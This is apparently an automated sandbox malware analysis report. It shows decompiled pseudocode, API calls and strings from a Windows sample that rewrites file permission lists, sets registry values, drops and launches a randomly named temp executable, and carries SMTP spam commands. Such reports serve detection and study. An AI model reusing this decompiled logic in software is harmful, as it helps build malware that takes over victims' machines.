                                                                                                                                  • wsprintfA.USER32 ref: 0040A9B9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$send$lstrlenrecv
                                                                                                                                  • String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                                                                  • API String ID: 3650048968-2394369944
                                                                                                                                  • Opcode ID: c6cb36aca3368d580b4f06862e298dacd866bb1fbaab33c91d69e95154328597
                                                                                                                                  • Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
                                                                                                                                  • Opcode Fuzzy Hash: c6cb36aca3368d580b4f06862e298dacd866bb1fbaab33c91d69e95154328597
                                                                                                                                  • Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00407809 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E00407809(CHAR* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _ACL* _v20;
				signed int _v24;
				int _v28;
				long _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				void _v128;
				char _v384;
				char _v512;
				struct _SECURITY_DESCRIPTOR _v1536;
				struct _ACL* _t110;
				int _t120;
				intOrPtr _t121;
				signed int _t123;
				signed int _t141;
				char* _t146;
				signed int _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t141 = 0;
				_v28 = 0;
				_v20 = 0;
				_v36 = 0x80;
				if(GetUserNameA( &_v384,  &_v36) == 0) {
					L42:
					return _v28;
				}
				_v32 = 0x44;
				_v40 = 0x80;
				if(LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56) == 0) {
					goto L42;
				}
				_v32 = GetLengthSid( &_v128);
				_v44 = 0x400;
				if(GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44) == 0) {
					goto L42;
				} else {
					if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
						_v36 = 0x80;
						_v40 = 0x80;
						if(EqualSid( &_v128, _v16) == 0) {
							_v28 = 1;
							_t155 = LocalAlloc(0x40, 0x14);
							if(_t155 != 0) {
								LocalFree(_t155);
							}
						}
					}
					_v24 = _t141;
					if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
						L41:
						goto L42;
					}
					_t110 = _v20;
					if(_t110 == _t141) {
						goto L41;
					}
					_v8 = _v8 & _t141;
					if(0 >= _t110->AceCount) {
						goto L41;
					} else {
						goto L13;
					}
					do {
						L13:
						if(GetAce(_t110, _v8,  &_v12) == 0) {
							L32:
							_v8 = _v8 + 1;
							goto L33;
						}
						_t153 = 0;
						_v16 = _v12 + 8;
						if(_t141 <= 0) {
							L19:
							if(_t141 < 0x20) {
								 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
								_t141 = _t141 + 1;
							}
							_t120 = EqualSid( &_v128, _v16);
							_t146 = _v12;
							if(_t120 == 0) {
								_t121 = 0x1200a8;
							} else {
								asm("sbb eax, eax");
								_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
							}
							if( *((intOrPtr*)(_t146 + 4)) != _t121) {
								 *((intOrPtr*)(_t146 + 4)) = _t121;
								_t146 = _v12;
								_v24 = 1;
							}
							if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
								 *_t146 = 0;
								_t66 = _v16 + 8; // 0xc8685f74
								_t123 =  *_t66;
								if(_t123 != 0) {
									 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
								} else {
									 *((char*)(_v12 + 1)) = 0xb;
								}
								_v24 = 1;
							}
							goto L32;
						}
						while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
							_t153 = _t153 + 1;
							if(_t153 < _t141) {
								continue;
							}
							break;
						}
						if(_t153 >= _t141) {
							goto L19;
						}
						DeleteAce(_v20, _v8);
						_v24 = 1;
						L33:
						_t110 = _v20;
					} while (_v8 < (_t110->AceCount & 0x0000ffff));
					if(_v24 != 0) {
						_v28 = 1;
						_t154 = LocalAlloc(0x40, 0x14);
						if(_t154 != 0) {
							if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0 && SetFileSecurityA(_a4, 4, _t154) != 0) {
								_v28 = 1;
							}
							LocalFree(_t154);
						}
					}
					goto L41;
				}
			}































                                                                                                                                  0x0040781e
                                                                                                                                  0x00407826
                                                                                                                                  0x00407829
                                                                                                                                  0x0040782c
                                                                                                                                  0x00407837
                                                                                                                                  0x00407a8e
                                                                                                                                  0x00407a94
                                                                                                                                  0x00407a94
                                                                                                                                  0x0040785c
                                                                                                                                  0x00407863
                                                                                                                                  0x0040786e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040787e
                                                                                                                                  0x0040788b
                                                                                                                                  0x004078a2
                                                                                                                                  0x00000000
                                                                                                                                  0x004078a8
                                                                                                                                  0x004078c3
                                                                                                                                  0x004078cc
                                                                                                                                  0x004078cf
                                                                                                                                  0x004078da
                                                                                                                                  0x004078e0
                                                                                                                                  0x004078e9
                                                                                                                                  0x004078ed
                                                                                                                                  0x00407917
                                                                                                                                  0x00407917
                                                                                                                                  0x004078ed
                                                                                                                                  0x004078da
                                                                                                                                  0x00407930
                                                                                                                                  0x0040793b
                                                                                                                                  0x00407a8d
                                                                                                                                  0x00000000
                                                                                                                                  0x00407a8d
                                                                                                                                  0x00407941
                                                                                                                                  0x00407946
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040794c
                                                                                                                                  0x00407955
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040795b
                                                                                                                                  0x0040795b
                                                                                                                                  0x0040796b
                                                                                                                                  0x00407a2a
                                                                                                                                  0x00407a2a
                                                                                                                                  0x00000000
                                                                                                                                  0x00407a2a
                                                                                                                                  0x00407977
                                                                                                                                  0x00407979
                                                                                                                                  0x0040797e
                                                                                                                                  0x004079ae
                                                                                                                                  0x004079b1
                                                                                                                                  0x004079b6
                                                                                                                                  0x004079bd
                                                                                                                                  0x004079bd
                                                                                                                                  0x004079c5
                                                                                                                                  0x004079cb
                                                                                                                                  0x004079d0
                                                                                                                                  0x004079e5
                                                                                                                                  0x004079d2
                                                                                                                                  0x004079d7
                                                                                                                                  0x004079de
                                                                                                                                  0x004079de
                                                                                                                                  0x004079ed
                                                                                                                                  0x004079ef
                                                                                                                                  0x004079f2
                                                                                                                                  0x004079f5
                                                                                                                                  0x004079f5
                                                                                                                                  0x004079fb
                                                                                                                                  0x00407a03
                                                                                                                                  0x00407a09
                                                                                                                                  0x00407a09
                                                                                                                                  0x00407a0e
                                                                                                                                  0x00407a24
                                                                                                                                  0x00407a10
                                                                                                                                  0x00407a13
                                                                                                                                  0x00407a13
                                                                                                                                  0x00407a27
                                                                                                                                  0x00407a27
                                                                                                                                  0x00000000
                                                                                                                                  0x004079fb
                                                                                                                                  0x00407980
                                                                                                                                  0x00407994
                                                                                                                                  0x00407997
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407997
                                                                                                                                  0x0040799b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004079a3
                                                                                                                                  0x004079a9
                                                                                                                                  0x00407a2d
                                                                                                                                  0x00407a2d
                                                                                                                                  0x00407a34
                                                                                                                                  0x00407a41
                                                                                                                                  0x00407a47
                                                                                                                                  0x00407a50
                                                                                                                                  0x00407a54
                                                                                                                                  0x00407a60
                                                                                                                                  0x00407a83
                                                                                                                                  0x00407a83
                                                                                                                                  0x00407a87
                                                                                                                                  0x00407a87
                                                                                                                                  0x00407a54
                                                                                                                                  0x00000000
                                                                                                                                  0x00407a41

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 0040782F
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00407878
                                                                                                                                  • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
                                                                                                                                  • GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
                                                                                                                                  • EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00407917
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00407963
                                                                                                                                  • EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
                                                                                                                                  • DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
                                                                                                                                  • EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00407A87
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 3722657555-2746444292
                                                                                                                                  • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                                                                  • Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
                                                                                                                                  • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                                                                  • Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00408328 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 361registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E00408328(char* __ecx, char __edx) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				struct _PROCESS_INFORMATION _v44;
				char _v60;
				struct _STARTUPINFOA _v128;
				char _v388;
				char _v427;
				char _v428;
				char _t88;
				char _t89;
				void* _t91;
				char _t93;
				int _t102;
				char _t107;
				intOrPtr _t113;
				char _t116;
				void* _t117;
				signed int _t122;
				char _t126;
				void* _t128;
				char* _t130;
				char _t131;
				char* _t133;
				char _t134;
				char* _t137;
				int _t139;
				char _t144;
				char _t146;
				char* _t147;
				char _t149;
				char _t153;
				intOrPtr* _t154;
				char* _t156;
				char* _t159;
				char _t160;
				char _t165;
				void* _t174;
				signed int _t177;
				char _t180;
				char* _t188;
				int _t189;
				long _t193;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				_t181 = __edx;
				_t173 = __ecx;
				_v16 = 0;
				if(E00407DD6(__edx) != 0) {
					return 1;
				}
				_t88 = E00406EC3();
				__eflags = _t88;
				if(_t88 != 0) {
					_v8 = 0;
					__eflags =  *0x412c3c; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					__eflags =  *0x412c38; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					_t130 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
					_t198 = _t196 + 0x14;
					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
					__eflags = _t131;
					if(_t131 != 0) {
						L31:
						_t133 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t198 = _t198 + 0x14;
						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
						__eflags = _t134;
						if(_t134 != 0) {
							L35:
							E0040EE2A(_t173, 0x4122f8, 0, 0x100);
							_t196 = _t198 + 0xc;
							__eflags = _v8;
							if(_v8 != 0) {
								E0040EC2E(_v8);
							}
							goto L37;
						}
						_t188 =  *0x412c3c; // 0x0
						_t137 = _t188;
						_t44 =  &(_t137[1]); // 0x1
						_t173 = _t44;
						do {
							_t181 =  *_t137;
							_t137 =  &(_t137[1]);
							__eflags = _t181;
						} while (_t181 != 0);
						_t139 = _t137 - _t173 + 1;
						__eflags = _t139;
						RegSetValueExA(_v12,  *0x412c38, 0, 1, _t188, _t139);
						RegCloseKey(_v12);
						goto L35;
					}
					_t144 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, 0,  &_v16);
					__eflags = _t144;
					if(_t144 == 0) {
						__eflags = _v28 - 1;
						if(_v28 == 1) {
							__eflags = _v16;
							if(_v16 > 0) {
								_t147 = E0040EBCC(_v16);
								_pop(_t173);
								_v8 = _t147;
								__eflags = _t147;
								if(_t147 != 0) {
									_t173 =  &_v16;
									_t149 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, _t147,  &_v16);
									__eflags = _t149;
									if(_t149 != 0) {
										E0040EC2E(_v8);
										_pop(_t173);
										_v8 = 0;
									}
								}
							}
						}
					}
					RegCloseKey(_v12);
					__eflags = _v8;
					if(_v8 != 0) {
						_t146 = E0040EED1(_v8,  *0x412c3c);
						_pop(_t173);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L35;
						}
					}
					goto L31;
				} else {
					_t153 = E004073FF(_t173, 0x410264, 0, 0,  &_v388,  &_v60);
					_t199 = _t196 + 0x14;
					__eflags = _t153;
					if(_t153 <= 0) {
						L19:
						_t91 = 0;
						L56:
						return _t91;
					}
					__eflags = _v388;
					if(_v388 == 0) {
						goto L19;
					}
					__eflags = _v60;
					if(_v60 == 0) {
						goto L19;
					} else {
						_t154 =  &_v388;
						_t181 = _t154 + 1;
						do {
							_t180 =  *_t154;
							_t154 = _t154 + 1;
							__eflags = _t180;
						} while (_t180 != 0);
						_t156 = _t195 + _t154 - _t181 - 0x181;
						__eflags =  *_t156 - 0x5c;
						if( *_t156 == 0x5c) {
							 *_t156 = 0;
						}
						__eflags =  *0x412159 - 0x60;
						if( *0x412159 < 0x60) {
							L18:
							E0040EE2A(_t180, 0x4122f8, 0, 0x100);
							_t196 = _t199 + 0xc;
							L37:
							_v20 = 0;
							_v8 = 0;
							__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
							if(__eflags == 0) {
								L42:
								__eflags =  *0x412cd8; // 0x0
								if(__eflags != 0) {
									L46:
									_t89 = E00406BA7(0x412cd8);
									_pop(_t174);
									__eflags = _t89;
									if(_t89 == 0) {
										L52:
										 *0x412cd8 = 0;
										L53:
										__eflags = _v8;
										if(_v8 != 0) {
											E0040EC2E(_v8);
										}
										_t91 = 1;
										__eflags = 1;
										goto L56;
									}
									_t93 = E00407E2F(_t181);
									__eflags = _t93;
									if(_t93 != 0) {
										L51:
										DeleteFileA(0x412cd8);
										goto L52;
									}
									_t193 = 0x44;
									E0040EE2A(_t174,  &_v128, 0, _t193);
									_v128.cb = _t193;
									E0040EE2A(_t174,  &_v44, 0, 0x10);
									_v428 = 0x22;
									lstrcpyA( &_v427, 0x412cd8);
									_t102 = lstrlenA( &_v428);
									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
									E00407FCF(_t174);
									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
									__eflags = _t107;
									if(_t107 == 0) {
										E00407EE6(_t174);
										E00407EAD(_t181, __eflags, 0);
										goto L51;
									}
									CloseHandle(_v44.hThread);
									CloseHandle(_v44);
									goto L53;
								}
								GetTempPathA(0x12c, 0x412cd8);
								_t113 = E00408274(0x412cd8);
								_pop(_t177);
								_v24 = _t113;
								_t116 = (E0040ECA5() & 0x00000003) + 5;
								_v20 = _t116;
								__eflags = _t116;
								if(_t116 <= 0) {
									L45:
									_t117 = E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8);
									_t69 = _v24 + 0x412cd8; // 0x0
									E0040EF00(_t69, _t117);
									E0040EE2A(_t177, 0x4122f8, 0, 0x100);
									_t196 = _t196 + 0x28;
									goto L46;
								} else {
									goto L44;
								}
								do {
									L44:
									_t122 = E0040ECA5();
									_t177 = 0x1a;
									_t181 = _t122 % _t177 + 0x61;
									_v24 = _v24 + 1;
									_v20 = _v20 - 1;
									 *((char*)(_v24 + 0x412cd8)) = _t122 % _t177 + 0x61;
									__eflags = _v20;
								} while (_v20 > 0);
								goto L45;
							}
							_t126 = E0040675C("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v20, 0);
							_t196 = _t196 + 0xc;
							_v8 = _t126;
							__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
							if(__eflags == 0) {
								goto L42;
							}
							__eflags = _t126;
							if(_t126 == 0) {
								goto L42;
							}
							__eflags = _v20 -  *0x4121a4; // 0x0
							if(__eflags != 0) {
								goto L42;
							}
							_t128 = E004024C2(_v8, _t127, 0);
							_t196 = _t196 + 0xc;
							__eflags =  *0x4122d4 - _t128; // 0x0
							if(__eflags == 0) {
								goto L53;
							}
							goto L42;
						}
						_t189 = 4;
						_v8 = 0;
						_v16 = _t189;
						_t159 = E00402544(0x4122f8,  &E00410710, 0x35, 0xe4, 0xc8);
						_t199 = _t199 + 0x14;
						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12);
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						}
						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16);
						__eflags = _t165;
						if(_t165 != 0) {
							L16:
							_v8 = 0;
							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189);
							L17:
							RegCloseKey(_v12);
							goto L18;
						}
						__eflags = _v28 - _t189;
						if(_v28 != _t189) {
							goto L16;
						}
						__eflags = _v16 - _t189;
						if(_v16 != _t189) {
							goto L16;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						goto L16;
					}
				}
			}





















































                                                                                                                                  0x00408328
                                                                                                                                  0x00408328
                                                                                                                                  0x00408334
                                                                                                                                  0x0040833e
                                                                                                                                  0x00000000
                                                                                                                                  0x00408342
                                                                                                                                  0x0040834a
                                                                                                                                  0x00408354
                                                                                                                                  0x00408356
                                                                                                                                  0x0040846b
                                                                                                                                  0x0040846e
                                                                                                                                  0x00408474
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040847a
                                                                                                                                  0x00408480
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004084a2
                                                                                                                                  0x004084ad
                                                                                                                                  0x004084b6
                                                                                                                                  0x004084b8
                                                                                                                                  0x004084ba
                                                                                                                                  0x00408543
                                                                                                                                  0x0040855f
                                                                                                                                  0x00408564
                                                                                                                                  0x0040856d
                                                                                                                                  0x0040856f
                                                                                                                                  0x00408571
                                                                                                                                  0x004085a5
                                                                                                                                  0x004085ac
                                                                                                                                  0x004085b1
                                                                                                                                  0x004085b4
                                                                                                                                  0x004085b7
                                                                                                                                  0x004085bc
                                                                                                                                  0x004085c1
                                                                                                                                  0x00000000
                                                                                                                                  0x004085b7
                                                                                                                                  0x00408573
                                                                                                                                  0x00408579
                                                                                                                                  0x0040857b
                                                                                                                                  0x0040857b
                                                                                                                                  0x0040857e
                                                                                                                                  0x0040857e
                                                                                                                                  0x00408580
                                                                                                                                  0x00408581
                                                                                                                                  0x00408581
                                                                                                                                  0x00408587
                                                                                                                                  0x00408587
                                                                                                                                  0x00408596
                                                                                                                                  0x0040859f
                                                                                                                                  0x00000000
                                                                                                                                  0x0040859f
                                                                                                                                  0x004084d3
                                                                                                                                  0x004084d9
                                                                                                                                  0x004084db
                                                                                                                                  0x004084dd
                                                                                                                                  0x004084e1
                                                                                                                                  0x004084e3
                                                                                                                                  0x004084e6
                                                                                                                                  0x004084eb
                                                                                                                                  0x004084f0
                                                                                                                                  0x004084f1
                                                                                                                                  0x004084f4
                                                                                                                                  0x004084f6
                                                                                                                                  0x004084f8
                                                                                                                                  0x0040850b
                                                                                                                                  0x00408511
                                                                                                                                  0x00408513
                                                                                                                                  0x00408518
                                                                                                                                  0x0040851d
                                                                                                                                  0x0040851e
                                                                                                                                  0x0040851e
                                                                                                                                  0x00408513
                                                                                                                                  0x004084f6
                                                                                                                                  0x004084e6
                                                                                                                                  0x004084e1
                                                                                                                                  0x00408524
                                                                                                                                  0x0040852a
                                                                                                                                  0x0040852d
                                                                                                                                  0x00408538
                                                                                                                                  0x0040853e
                                                                                                                                  0x0040853f
                                                                                                                                  0x00408541
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408541
                                                                                                                                  0x00000000
                                                                                                                                  0x0040835c
                                                                                                                                  0x0040836e
                                                                                                                                  0x00408373
                                                                                                                                  0x00408376
                                                                                                                                  0x00408378
                                                                                                                                  0x00408464
                                                                                                                                  0x00408464
                                                                                                                                  0x00408779
                                                                                                                                  0x00000000
                                                                                                                                  0x0040877a
                                                                                                                                  0x0040837e
                                                                                                                                  0x00408384
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040838a
                                                                                                                                  0x0040838d
                                                                                                                                  0x00000000
                                                                                                                                  0x00408393
                                                                                                                                  0x00408393
                                                                                                                                  0x00408399
                                                                                                                                  0x0040839c
                                                                                                                                  0x0040839c
                                                                                                                                  0x0040839e
                                                                                                                                  0x0040839f
                                                                                                                                  0x0040839f
                                                                                                                                  0x004083a5
                                                                                                                                  0x004083ac
                                                                                                                                  0x004083af
                                                                                                                                  0x004083b1
                                                                                                                                  0x004083b1
                                                                                                                                  0x004083b3
                                                                                                                                  0x004083ba
                                                                                                                                  0x00408450
                                                                                                                                  0x00408457
                                                                                                                                  0x0040845c
                                                                                                                                  0x004085c2
                                                                                                                                  0x004085c2
                                                                                                                                  0x004085c5
                                                                                                                                  0x004085c8
                                                                                                                                  0x004085ce
                                                                                                                                  0x00408615
                                                                                                                                  0x0040861a
                                                                                                                                  0x00408620
                                                                                                                                  0x004086a7
                                                                                                                                  0x004086a8
                                                                                                                                  0x004086ad
                                                                                                                                  0x004086ae
                                                                                                                                  0x004086b0
                                                                                                                                  0x00408762
                                                                                                                                  0x00408762
                                                                                                                                  0x00408768
                                                                                                                                  0x00408768
                                                                                                                                  0x0040876b
                                                                                                                                  0x00408770
                                                                                                                                  0x00408775
                                                                                                                                  0x00408778
                                                                                                                                  0x00408778
                                                                                                                                  0x00000000
                                                                                                                                  0x00408778
                                                                                                                                  0x004086b6
                                                                                                                                  0x004086bb
                                                                                                                                  0x004086bd
                                                                                                                                  0x0040875b
                                                                                                                                  0x0040875c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040875c
                                                                                                                                  0x004086c5
                                                                                                                                  0x004086cc
                                                                                                                                  0x004086d8
                                                                                                                                  0x004086db
                                                                                                                                  0x004086eb
                                                                                                                                  0x004086f2
                                                                                                                                  0x004086ff
                                                                                                                                  0x00408705
                                                                                                                                  0x0040870d
                                                                                                                                  0x00408714
                                                                                                                                  0x00408733
                                                                                                                                  0x00408739
                                                                                                                                  0x0040873b
                                                                                                                                  0x0040874f
                                                                                                                                  0x00408755
                                                                                                                                  0x00000000
                                                                                                                                  0x0040875a
                                                                                                                                  0x00408746
                                                                                                                                  0x0040874b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040874b
                                                                                                                                  0x0040862c
                                                                                                                                  0x00408633
                                                                                                                                  0x00408638
                                                                                                                                  0x00408639
                                                                                                                                  0x00408644
                                                                                                                                  0x00408647
                                                                                                                                  0x0040864a
                                                                                                                                  0x0040864c
                                                                                                                                  0x00408671
                                                                                                                                  0x00408683
                                                                                                                                  0x0040868c
                                                                                                                                  0x00408693
                                                                                                                                  0x0040869f
                                                                                                                                  0x004086a4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040864e
                                                                                                                                  0x0040864e
                                                                                                                                  0x0040864e
                                                                                                                                  0x00408657
                                                                                                                                  0x0040865d
                                                                                                                                  0x00408660
                                                                                                                                  0x00408663
                                                                                                                                  0x00408666
                                                                                                                                  0x0040866c
                                                                                                                                  0x0040866c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040864e
                                                                                                                                  0x004085da
                                                                                                                                  0x004085df
                                                                                                                                  0x004085e2
                                                                                                                                  0x004085e5
                                                                                                                                  0x004085eb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004085ed
                                                                                                                                  0x004085ef
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004085f4
                                                                                                                                  0x004085fa
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408601
                                                                                                                                  0x00408606
                                                                                                                                  0x00408609
                                                                                                                                  0x0040860f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040860f
                                                                                                                                  0x004083c2
                                                                                                                                  0x004083df
                                                                                                                                  0x004083e2
                                                                                                                                  0x004083e5
                                                                                                                                  0x004083ea
                                                                                                                                  0x004083f3
                                                                                                                                  0x004083f9
                                                                                                                                  0x004083fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408414
                                                                                                                                  0x0040841a
                                                                                                                                  0x0040841c
                                                                                                                                  0x0040842d
                                                                                                                                  0x0040843e
                                                                                                                                  0x00408441
                                                                                                                                  0x00408447
                                                                                                                                  0x0040844a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040844a
                                                                                                                                  0x0040841e
                                                                                                                                  0x00408421
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408423
                                                                                                                                  0x00408426
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408428
                                                                                                                                  0x0040842b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040842b
                                                                                                                                  0x0040838d

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
                                                                                                                                  • RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
                                                                                                                                  • RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
                                                                                                                                  • RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$CloseOpenQuery
                                                                                                                                  • String ID: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$localcfg
                                                                                                                                  • API String ID: 237177642-493989863
                                                                                                                                  • Opcode ID: efd62ad2f798959cafcb8abb2af2c905d2a72a8beefa2774c48dbd7e0eb95f79
                                                                                                                                  • Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
